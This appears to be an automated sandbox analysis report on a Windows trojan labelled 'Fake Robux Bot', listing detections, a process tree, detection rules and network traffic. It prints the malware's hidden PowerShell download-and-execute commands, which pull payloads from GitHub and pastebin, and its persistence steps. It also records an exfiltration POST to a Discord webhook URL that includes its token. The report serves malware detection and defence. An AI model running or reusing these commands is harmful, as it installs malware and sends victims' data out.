
Windows Analysis Report
Lm9IJ4r9oO.exe

Overview

General Information

Sample name: Lm9IJ4r9oO.exe (renamed because the original name is a hash value)
Original sample name: 23ce79edb738b3e6dfad9f4dff2ff1800c8f3ccd3b3e809d4dd95c8b3ecfe5dc.exe
Analysis ID: 1534109
MD5: 032bc4fb50a2d4fc55727d99248b29b2
SHA1: c517bf569347599fe848c3fc9381f6daf3f9ec71
SHA256: 23ce79edb738b3e6dfad9f4dff2ff1800c8f3ccd3b3e809d4dd95c8b3ecfe5dc
Tags: exe, Neth3N, user-JAMESWT_MHT

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell Download and Execute IEX
Suricata IDS alerts for network traffic
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Machine Learning detection for sample
Powershell creates an autostart link
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to open files direct via NTFS file id
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Lm9IJ4r9oO.exe (PID: 7676 cmdline: "C:\Users\user\Desktop\Lm9IJ4r9oO.exe" MD5: 032BC4FB50A2D4FC55727D99248B29B2)
    • powershell.exe (PID: 7696 cmdline: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)' MD5: 3F92A35BA26FF7A11A49E15EFE18F0C2)
      • conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 7366FBEFE66BA0F1F5304F7D6FEF09FE)
      • powershell.exe (PID: 7900 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing) MD5: 3F92A35BA26FF7A11A49E15EFE18F0C2)
        • conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 7366FBEFE66BA0F1F5304F7D6FEF09FE)
        • csc.exe (PID: 8132 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 8148 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBF7B.tmp" "c:\Users\user\AppData\Local\Temp\ztufso2n\CSC92EFC5D82192472686D16339634A9CDA.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • attrib.exe (PID: 5436 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
    • WerFault.exe (PID: 7260 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7676 -s 1932 MD5: F5210A4A7E411A1BAD3844586A74B574)
  • forfiles.exe (PID: 7668 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 7366FBEFE66BA0F1F5304F7D6FEF09FE)
    • powershell.exe (PID: 7756 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: DFD66604CA0898E8E26DF7B1635B6326)
      • powershell.exe (PID: 4116 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: DFD66604CA0898E8E26DF7B1635B6326)
  • forfiles.exe (PID: 1808 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 2076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 7366FBEFE66BA0F1F5304F7D6FEF09FE)
    • powershell.exe (PID: 2136 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: DFD66604CA0898E8E26DF7B1635B6326)
      • powershell.exe (PID: 7688 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: DFD66604CA0898E8E26DF7B1635B6326)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Source: Process Memory Space: powershell.exe PID: 7900 | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen | Strings:
  • 0xa677:$b1: ::WriteAllBytes(
  • 0x1c6ac:$b1: ::WriteAllBytes(
  • 0xe0375:$b1: ::WriteAllBytes(
  • 0x3b5ce:$s1: -join
  • 0x84bb0:$s1: -join
  • 0x91c85:$s1: -join
  • 0x95057:$s1: -join
  • 0x95709:$s1: -join
  • 0x971fa:$s1: -join
  • 0x99400:$s1: -join
  • 0x99c27:$s1: -join
  • 0x9a497:$s1: -join
  • 0x9abd2:$s1: -join
  • 0x9ac04:$s1: -join
  • 0x9ac4c:$s1: -join
  • 0x9ac6b:$s1: -join
  • 0x9b4bb:$s1: -join
  • 0x9b637:$s1: -join
  • 0x9b6af:$s1: -join
  • 0x9b742:$s1: -join
  • 0x9b9a8:$s1: -join
Source: Process Memory Space: powershell.exe PID: 4116 | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen | Strings:
  • 0x138fea:$b1: ::WriteAllBytes(
  • 0x19f1e4:$b1: ::WriteAllBytes(
  • 0x38b94:$s1: -join
  • 0x38d51:$s1: -join
  • 0xc64ae:$s1: -join
  • 0xc6c0e:$s1: -join
  • 0x128e62:$s1: -join
  • 0x129d89:$s1: -join
  • 0x192b61:$s1: -join
  • 0x1aff9f:$s1: -join
  • 0x1bd074:$s1: -join
  • 0x1c0446:$s1: -join
  • 0x1c0af8:$s1: -join
  • 0x1c25e9:$s1: -join
  • 0x1c47ef:$s1: -join
  • 0x1c5016:$s1: -join
  • 0x1c5886:$s1: -join
  • 0x1c5fc1:$s1: -join
  • 0x1c5ff3:$s1: -join
  • 0x1c603b:$s1: -join
  • 0x1c605a:$s1: -join
Source: Process Memory Space: powershell.exe PID: 7688 | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen | Strings:
  • 0x37231:$b1: ::WriteAllBytes(
  • 0x1d6016:$b1: ::WriteAllBytes(
  • 0x233f5:$s1: -join
  • 0x23b31:$s1: -join
  • 0x49c21:$s1: -join
  • 0x4a381:$s1: -join
  • 0x89e7e:$s1: -join
  • 0x96f53:$s1: -join
  • 0x9a325:$s1: -join
  • 0x9a9d7:$s1: -join
  • 0x9c4c8:$s1: -join
  • 0x9e6ce:$s1: -join
  • 0x9eef5:$s1: -join
  • 0x9f765:$s1: -join
  • 0x9fea0:$s1: -join
  • 0x9fed2:$s1: -join
  • 0x9ff1a:$s1: -join
  • 0x9ff39:$s1: -join
  • 0xa0789:$s1: -join
  • 0xa0905:$s1: -join
  • 0xa097d:$s1: -join
Source | Rule | Description | Author | Strings
Source: amsi64_4116.amsi.csv | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen | Strings:
  • 0xb646:$b1: ::WriteAllBytes(
  • 0x9d4b:$s1: -join
  • 0x34f7:$s4: +=
  • 0x35b9:$s4: +=
  • 0x77e0:$s4: +=
  • 0x98fd:$s4: +=
  • 0x9be7:$s4: +=
  • 0x9d2d:$s4: +=
  • 0xdd70:$s4: +=
  • 0xddf0:$s4: +=
  • 0xdeb6:$s4: +=
  • 0xdf36:$s4: +=
  • 0xe10c:$s4: +=
  • 0xe190:$s4: +=
  • 0xb6e0:$e4: Get-WmiObject
  • 0xb782:$e4: Get-WmiObject
  • 0xc259:$e4: Get-WmiObject
  • 0xc448:$e4: Get-Process
  • 0xc4a0:$e4: Start-Process
Source: amsi64_7688.amsi.csv | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen | Strings:
  • 0xb646:$b1: ::WriteAllBytes(
  • 0x9d4b:$s1: -join
  • 0x34f7:$s4: +=
  • 0x35b9:$s4: +=
  • 0x77e0:$s4: +=
  • 0x98fd:$s4: +=
  • 0x9be7:$s4: +=
  • 0x9d2d:$s4: +=
  • 0xdd70:$s4: +=
  • 0xddf0:$s4: +=
  • 0xdeb6:$s4: +=
  • 0xdf36:$s4: +=
  • 0xe10c:$s4: +=
  • 0xe190:$s4: +=
  • 0xb6e0:$e4: Get-WmiObject
  • 0xb782:$e4: Get-WmiObject
  • 0xc259:$e4: Get-WmiObject
  • 0xc448:$e4: Get-Process
  • 0xc4a0:$e4: Start-Process

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', CommandLine: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Lm9IJ4r9oO.exe", ParentImage: C:\Users\user\Desktop\Lm9IJ4r9oO.exe, ParentProcessId: 7676, ParentProcessName: Lm9IJ4r9oO.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', ProcessId: 7696, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix) | Data: Command: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', CommandLine: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Lm9IJ4r9oO.exe", ParentImage: C:\Users\user\Desktop\Lm9IJ4r9oO.exe, ParentProcessId: 7676, ParentProcessName: Lm9IJ4r9oO.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', ProcessId: 7696, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk", EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7900, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync
Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing) , ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7900, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.cmdline", ProcessId: 8132, ProcessName: csc.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', CommandLine: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Lm9IJ4r9oO.exe", ParentImage: C:\Users\user\Desktop\Lm9IJ4r9oO.exe, ParentProcessId: 7676, ParentProcessName: Lm9IJ4r9oO.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', ProcessId: 7696, ProcessName: powershell.exe
Source: Process started | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger | Data: Command: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', CommandLine: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Lm9IJ4r9oO.exe", ParentImage: C:\Users\user\Desktop\Lm9IJ4r9oO.exe, ParentProcessId: 7676, ParentProcessName: Lm9IJ4r9oO.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', ProcessId: 7696, ProcessName: powershell.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7900, TargetFilename: C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.cmdline
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', CommandLine: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Lm9IJ4r9oO.exe", ParentImage: C:\Users\user\Desktop\Lm9IJ4r9oO.exe, ParentProcessId: 7676, ParentProcessName: Lm9IJ4r9oO.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', ProcessId: 7696, ProcessName: powershell.exe

Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', CommandLine: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Lm9IJ4r9oO.exe", ParentImage: C:\Users\user\Desktop\Lm9IJ4r9oO.exe, ParentProcessId: 7676, ParentProcessName: Lm9IJ4r9oO.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', ProcessId: 7696, ProcessName: powershell.exe
Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing) , ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7900, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.cmdline", ProcessId: 8132, ProcessName: csc.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-15T15:55:12.953506+0200 | 2857659 | 1 | A Network Trojan was detected | 192.168.2.3 | 62871 | 162.159.138.232 | 443 | TCP
2024-10-15T15:55:18.941754+0200 | 2857659 | 1 | A Network Trojan was detected | 192.168.2.3 | 62872 | 162.159.138.232 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-15T15:54:51.325571+0200 | 2857658 | 1 | A Network Trojan was detected | 192.168.2.3 | 62862 | 162.159.138.232 | 443 | TCP


AV Detection

Source: Lm9IJ4r9oO.exe | Avira: detected
Source: Lm9IJ4r9oO.exe | ReversingLabs: Detection: 42%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Lm9IJ4r9oO.exe | Joe Sandbox ML: detected
Source: Lm9IJ4r9oO.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.3:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.3:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.3:62862 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.3:62864 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.3:62866 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.3:62868 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.3:62870 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.3:62871 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.3:62872 version: TLS 1.2
Source: Lm9IJ4r9oO.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: Automation.pdb source: powershell.exe, 00000004.00000002.1820569925.00000000073A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000018.00000002.2227640712.000001D0F6650000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Programming1\ConsoleApplication2\Release\ConsoleApplication2.pdb source: Lm9IJ4r9oO.exe
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000004.00000002.1836250015.0000000008455000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbO source: powershell.exe, 00000018.00000002.2227640712.000001D0F677B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ib.pdb source: powershell.exe, 00000018.00000002.2227640712.000001D0F66A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1836250015.0000000008455000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2227640712.000001D0F673E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000004.00000002.1820569925.000000000739F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2227640712.000001D0F6650000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 5c561934e089\mscorlib.pdb source: powershell.exe, 00000018.00000002.2227640712.000001D0F677B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbg source: powershell.exe, 00000018.00000002.2227640712.000001D0F66A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: e089\mscorlib.pdbHo source: powershell.exe, 00000018.00000002.2227640712.000001D0F677B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Commands.Utility.pdb4e089` source: powershell.exe, 00000004.00000002.1835795117.00000000083B0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Managem..Automation.pdb source: powershell.exe, 00000004.00000002.1820569925.00000000073A1000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exe | Code function: 0_2_0068B063 FindFirstFileExW, 0_2_0068B063

Networking

Source: Network traffic | Suricata IDS: 2857658 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Registration : 192.168.2.3:62862 -> 162.159.138.232:443
Source: Network traffic | Suricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.3:62871 -> 162.159.138.232:443
Source: Network traffic | Suricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.3:62872 -> 162.159.138.232:443
Source: unknown | DNS query: name: pastebin.com
Source: Joe Sandbox View | IP Address: 104.20.3.235
Source: Joe Sandbox View | IP Address: 104.20.3.235
Source: Joe Sandbox View | IP Address: 162.159.138.232
Source: Joe Sandbox View | IP Address: 185.199.110.133
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: FASTLYUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpTODgkBqgFx7seLHmsLq996 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031 | Content-Type: application/json | Host: discord.com | Content-Length: 212 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031 | Host: raw.githubusercontent.com | Connection: Keep-Alive
